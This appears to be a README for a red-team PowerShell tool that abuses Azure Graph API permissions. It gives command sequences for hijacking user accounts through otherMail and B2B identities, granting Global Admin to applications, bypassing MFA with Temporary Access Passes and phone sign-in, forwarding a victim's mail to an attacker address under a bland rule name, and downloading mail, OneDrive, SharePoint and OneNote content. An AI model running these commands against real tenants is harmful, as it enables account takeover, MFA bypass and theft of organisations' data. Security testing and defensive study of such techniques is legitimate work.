AbuseAzureAPIPermissions
AbuseAzureAPIPermissions copied to clipboard
Published
20 hours ago •
Hagrid29
Hagrid29
Abuse Azure API permissions for red teaming
Abuse Azure API Permissions
While reading blog post from Any Robbins and Black Hat USA 2022 talk from Dirk-jan, I found there are lots of fun to play with Azure application.
This script would be good to use when
- Azure Portal was blocked by organization but still allowing query from Graph API with client app "Microsoft Azure PowerShell" or "Azure Active Directory PowerShell" or etc. It helps you to recon
- compromised privileged account like Global Admin. It helps you to persist and collect data by different means
- compromised AAD Sync account [REF] or application owner or application admin or etc. It allow you add credential to service principle and compromise further resources depending on the permission it has
| Least Permission | Tactic | Abuse | Abuse Function |
|---|---|---|---|
| Application.Read.All | Recon | Search for interesting app role assignment such as RoleManagement.ReadWrite.Directory | Find-AAAInterestingAppRoleAssignment |
| RoleManagement.Read.Directory | Recon | Search for privileged directory role assignment such as Global Admin | Find-AAAInterestingDirectoryRoleAssignment |
| Application.Read.All | Recon | Obtain details of service principles | Get-AAAApplication |
| User.Read.All | Recon | Obtain details of Azure users including registered devices, groups | Get-AAAUser |
| GroupMember.Read.All | Recon | Obtain details of Azure group | Get-AAAGroups |
| Application.ReadWrite.All | PE (application), Persistence | Add credential to an application | New-AAAAppPassword |
| User.ReadWrite.All [REF-Microsoft permission] | PE (non-admin user) | Hijack Azure account by editing otherMail of target user to convert into B2B user [REF-BlackHat USA 2022] | New-AAAUserOtherMails |
| User.Invite.All + User.ManageIdentities.All | PE (admin user) | Hijack Azure account by adding B2B identity of target user | New-AAAUserB2BIdentities |
| RoleManagement.ReadWrite.Directory | PE (admin user), Persistence | Assign application with privileged directory role [REF-Andy Robbins] | Set-AAADirectoryRoleMember |
| AppRoleAssignment.ReadWrite.All + Application.Read.All | PE (admin user) | Assign application with privileged app role [REF-Andy Robbins] | Set-AAAAppRoleAssignments |
| Policy.ReadWrite.AuthenticationMethod + Organization.ReadWrite.All | PE (admin user), Persistence | Configure Certificate-based authentication for organization [REF-Andy Robbins] | New-AAAUserAuthCert |
| Policy.ReadWrite.AuthenticationMethod + UserAuthenticationMethod.ReadWrite.All | PE (admin user), Defence Evasion (bypass MFA), Persistence | Configure Temporary Access Pass for a user | Set-AAAUserAuthTempPass |
| Policy.ReadWrite.AuthenticationMethod + UserAuthenticationMethod.ReadWrite.All | Defence Evasion (bypass MFA) | Configure phone sign-in MFA method for a user | Set-AAAUserAuthPhone |
| Site.Read.All | Data Collection | Read files in SharePoint | Get-AAAOneDriveFile |
| Files.Read.All | Data Collection | Read files in OneDrive | Get-AAAOneDriveFile |
| Notes.Read.All | Data Collection | Read content of OneNote | Get-AAAOneNotesContent |
| Mail.Read | Data Collection | Read content of emails | Get-AAAEmails |
| MailboxSettings.ReadWrite | Data Collection | Configure mail forwarding rule of a user | New-AAAEmailRules |
| [REF-Microsoft permission] | Persistence | Reset password of a user | Set-AAAUserPassword |
Get Start
Login with Az module
Import-Module .\AbuseAzureAPIPermissions.ps1
Install-Module Az
# login with prompt
Get-AAATokenFromAzLogin
# login as service principal
Get-AAATokenFromAzLogin -User "XXX" -Password "XXX" -TenantId "XXX" -ServicePrincipal
# extract data from token
Get-AAADataFromGraphToken
Login with AADInternals module
AADinternals use client app "Azure Active Directory PowerShell" while this use "Microsoft Azure PowerShell". The reason behind this is "Azure Active Directory PowerShell" may blocked by organization commonly.
Import-Module .\AbuseAzureAPIPermissions.ps1
Import-Module .\AADIntAccessToken\AccessToken.ps1
Import-Module .\AADIntAccessToken\AccessToken_utils.ps1
Import-Module .\AADIntAccessToken\CommonUtils.ps1
# login with prompt
Get-AAATokenFromAADInt
# login with device code flow
Get-AAATokenFromAADInt -UseDeviceCode
# Refersh expired token
Get-AAATokenFromAADInt -Refresh
Recon
App Role assignment
Permission: Application.Read.All, Application.ReadWrite.OwnedBy, Directory.Read.All, Application.ReadWrite.All, Directory.ReadWrite.All
Search for any interesting app role (e.g., File.Read.All) assigned to service principle
Find-AAAInterestingAppRoleAssignment -Application
Find-AAAInterestingAppRoleAssignment -ServicePrinciple
Get-AAAAppRoleAssignments -AppId 'XXXX' -Readable
Directory Role Assignment
Permission: RoleManagement.Read.Directory, Directory.Read.All, RoleManagement.ReadWrite.Directory, Directory.ReadWrite.All
Search for privileged directory role (e.g., Global Admin) assignment
Find-AAAInterestingDirectoryRoleAssignment -ServicePrinciple
Find-AAAInterestingDirectoryRoleAssignment -User
Find-AAAInterestingDirectoryRoleAssignment -Guest
$AppAdminTempateId = "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3"
Get-AAADirectoryRoleMember -RoleTemplateId $AppAdminTempateId -filter ServicePrinciple
Application
Permission: Application.Read.All, Application.ReadWrite.OwnedBy, Application.ReadWrite.All, Directory.Read.All, Directory.ReadWrite.All
Get the details (e.g., app URL, owner) of service principles
Get-AAAApplication
Get-AAAApplication -ServicePrinciple -AppId 'XXXX'
Get-AAAApplication -Application -Search "citrix"
User
Permission: User.Read.All, User.ReadWrite.All, Directory.Read.All, Directory.ReadWrite.All
Get the details (e.g., registered devices, groups) of user
Get-AAAUser
Get-AAAUser -UserId "[email protected]"
Get-AAAUser -Search "sync" # search for AAD Sync service account
Get-AAAUserDevices -UserId "[email protected]"
Get-AAAUserMemberOf -UserId "[email protected]"
Permission: UserAuthenticationMethod.Read.All, UserAuthenticationMethod.ReadWrite.All
Get authen method of a user
Get-AAAUserAuthMethod -UserId "[email protected]"
Group
Permission: GroupMember.Read.All, Group.Read.All, Directory.Read.All, Group.ReadWrite.All, Directory.ReadWrite.All
Get the details of group
Get-AAAGroups
Get-AAAGroups -Search "helpdesk"
Get-AAAGroupMembers -GroupId "XXX"
Privilege Escalation
Add Credential to Application (PE to application)
Permission: Application.ReadWrite.All
Add password credential for application
New-AAAAppPassword -ServicePrinciple -AppId 'XXXX'
# Clean up
Remove-AAAAppPassword -ServicePrinciple -AppId 'XXXX' -KeyId 'XXXX'
Hijack Azure account - otherMail properties (PE to non-admin user)
Permission: User.ReadWrite.All, Directory.ReadWrite.All (apply to non-admin user)
Permission of privileged directory role: [REF-Microsoft permission]
Hijack normal Azure account (member without mailbox) by editing otherMail of target user to convert into B2B user [REF-BlackHat USA 2022].
# Hijack a member without mailbox
$victim = "[email protected]"
$attackerMail = "[email protected]"
$DisplayName = "Tommy Cheung"
Set-AAAUserMail -UserId $victim -mail $attackerMail
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resendInvitation -UserId $victim -mail $attackerMail
Set-AAAUserDisplayname -UserId $victim -DisplayName $DisplayName
(Get-AAAUser -UserId $victim).identities
# Hijack a guest account
$victim = "XXX"
$attackerMail = "[email protected]"
Set-AAAUserMail -UserId $victim -mail $attackerMail
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resetRedemption -UserId $victim -mail $attackerMail
# Hijack a member that had been converted to B2B user already
$victim = "[email protected]"
$attackerMail = "[email protected]"
Set-AAAUserMail -UserId $victim -mail $attackerMail
Remove-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resetRedemption -UserId $victim -mail $attackerMail
# Clean up
Set-AAAUserMail -UserId "[email protected]" -mail "[email protected]"
Remove-AAAUserOtherMails -UserId "[email protected]" -otherMails "[email protected]"
Hijack Azure account - identities properties (PE to admin user)
Permission for inviting user: User.Invite.All, User.ReadWrite.All, Directory.ReadWrite.All
Permission for adding new identities: User.ManageIdentities.All (apply to all user), Directory.ReadWrite.All (apply to non-admin user)
Permission for cleaning up: User.Read.All + User.ManageIdentities.All (apply to all user), Directory.ReadWrite.All (apply to non-admin user)
Hijack privileged Azure account (member with/without mailbox) by adding B2B identity of target user
# Hijack a member with/without mailbox
$victim = "[email protected]"
$attackerMail = "[email protected]"
New-AAAUserB2BIdentities -UserId $victim -mail $attackerMail
Send-AAAB2BInvitation -action sendInvitation -mail $attackerMail -Displayname "Tommy Cheung"
# Clean up
Remove-AAAUserB2BIdentities -UserId "[email protected]" -mail "[email protected]"
Assign Directory Role (PE to admin user)
Permission: RoleManagement.ReadWrite.Directory
Assign privileged directory role (e.g., Global Admin) to target object [REF-Andy Robbins]
$TargetObjectId = "XXXX"
$GlobalAdminTempalteId = "62e90394-69f5-4237-9190-012177145e10"
Set-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $TargetObjectId
#Clean up
Remove-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $TargetObjectId
Assign App Role (PE to admin user)
Permission: AppRoleAssignment.ReadWrite.All and Application.Read.All, AppRoleAssignment.ReadWrite.All and Directory.Read.All
Assign privileged application role (e.g., RoleManagement.ReadWrite.Directory) to target service principle [REF-Andy Robbins]
# Assign "Sites.ReadWrite.All" to specific application to access all SharePoint Sites and OneDrive
Set-AAAAppRoleAssignments -AppId 'XXXX' -AppRoleId "9492366f-7969-46a4-8d15-ed1a20078fff"
# Assign "RoleManagement.ReadWrite.Directory" to specific application and assign Global Admin role to itself
$CurrentAppId = "XXXX"
$CurrentObjectId = (Get-AAAApplication -ServicePrinciple -AppId $CurrentAppId).id
$GlobalAdminTempalteId = "62e90394-69f5-4237-9190-012177145e10"
Set-AAAAppRoleAssignments -AppId $CurrentAppId -AppRoleId "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"
Set-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $CurrentObjectId
# Clean up
Remove-AAAAppRoleAssignments -AppId "XXXX" -AssignId "XXXX"
Remove-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $CurrentObjectId
Configure Certificate-based authentication (PE to admin user)
Permission for configuring authen method: Policy.ReadWrite.AuthenticationMethod
Permission for configuring cert-based authen: Organization.ReadWrite.All
Configure Certificate-based authentication for organization [REF-Andy Robbins]
# Enable cert-based authen method for organization
Set-AAAAutenMethod -CertAuth
# Generate and upload cert file
linux# ./AAAUserAuthCert.sh -g crt
New-AAAUserAuthCert -CertFile ".\ca.crt"
# Generate pfx file to login as [email protected]. Can install the pfx file locally for authen
linux# ./AAAUserAuthCert.sh -g pfx -u [email protected] -s "/C=AU/ST=XX/L=XX/O=XXX/OU=IT/[email protected]"
# Clean up
Set-AAAAutenMethod -CertAuth -Disable
Remove-AAAUserAuthCert -issuerSki "XXXX"
Configure Temporary Access Pass (PE to admin user, bypass MFA)
Permission for configuring authen method: Policy.ReadWrite.AuthenticationMethod
Permission for configuring temp access pass authen: UserAuthenticationMethod.ReadWrite.All
Configure Temporary Access Pass for a user
Set-AAAAutenMethod -TempPass
Set-AAAUserAuthTempPass -UserId "[email protected]"
# Clean up
Remove-AAAUserAuthTempPass -UserId "[email protected]" -TempPassId "XXXX"
Set-AAAAutenPolicy -TempPass -Disable
Defence Evasion
Configure phone sign-in MFA (bypass MFA)
Permission for configuring authen method: Policy.ReadWrite.AuthenticationMethod
Permission for configuring phone sign-in authen: UserAuthenticationMethod.ReadWrite.All
Configure phone sign-in MFA method for a user
Set-AAAAutenMethod -sms
Set-AAAUserAuthPhone -UserId "[email protected]" -phoneNumber "+852XXXXXXX"
# Clean up
Remove-AAAUserAuthPhone -UserId "[email protected]" -phoneNumber "+852XXXXXXX"
Set-AAAAutenPolicy -sms -Disable
Data Collection
SharePoint
Permission: Sites.Read.All, Sites.ReadWrite.All, Sites.Manage.All, Sites.FullControl.All
List details and download item from a SharePoint site
Get-AAASite
Get-AAAOneDriveFolder -SitetId "XXXX"
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -showDetails
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -recurse | Export-CSV -Encoding UFT8 Result.csv
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -Parent
Get-AAAOneDriveFolder -SitetId "XXXX" -FileId "XXXX" -Download
OneDrive
Permission: Files.Read.All, Files.ReadWrite.All, Sites.Read.All, Sites.ReadWrite.All, Sites.Manage.All, Sites.FullControl.All
List details of and download item from a OneDrive of a user
Get-AAAOneDriveFolder -UserId "[email protected]"
Get-AAAOneDriveFolder -UserId "[email protected]" -FolderId "XXXX"
Get-AAAOneDriveFolder -UserId "[email protected]" -FileId "XXXX" -Download
OneNote
Permission: Notes.Read.All, Notes.ReadWrite.All
List details of and download One Note items of a user
Get-AAAOneNotes -UserId "[email protected]"
Get-AAAOneNotesContent -UserId "[email protected]" -PageId "XXXX" -OutHTMLFile output.html
Permission: Mail.Read, Mail.ReadWrite
Read emails and download attachments from a mailbox
Get-AAAEmails -UserId "[email protected]"
Get-AAAEmails -UserId "[email protected]" -Search "password" -Top 7
Get-AAAEmails -UserId "[email protected]" -MessageId "XXXX"
Get-AAAEmailAttachments -UserId "[email protected]" -MessageId "XXXX"
Get-AAAEmailAttachments -UserId "[email protected]" -MessageId "XXXX" -AttachmentId "XXXX"
Create Mail Rule
Permission: MailboxSettings.ReadWrite
Create a highest order mail rule to forward all email of a mailbox. Be cautious of detection and alert of mail rule creation for forwarding email to external mailbox.
$victim = "[email protected]"
$attackerMail = "[email protected]"
Get-AAAEmailRules -UserId $victim
New-AAAEmailRules -UserId $victim -MailRuleDisplayName "Reporting Rule" -EmailDisplayName "Tommy Cheung (IT)" -Email $attackerMail
# Clean up
Remove-AAAEmailRules -UserId $victim -MailRuleId "XXXX"
Persistence
Reset password
Permission of privileged directory role: [REF-Microsoft permission]
Change password of users
Set-AAAUserPassword -UserId "[email protected]" -password "P@ssw0rd@1112233"
References
- https://github.com/Gerenios/AADInternals
- https://dirkjanm.io/assets/raw/US-22-Mollema-Backdooring-and-hijacking-Azure-AD-accounts_final.pdf
- https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48
- https://medium.com/specter-ops-posts/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f
Hagrid29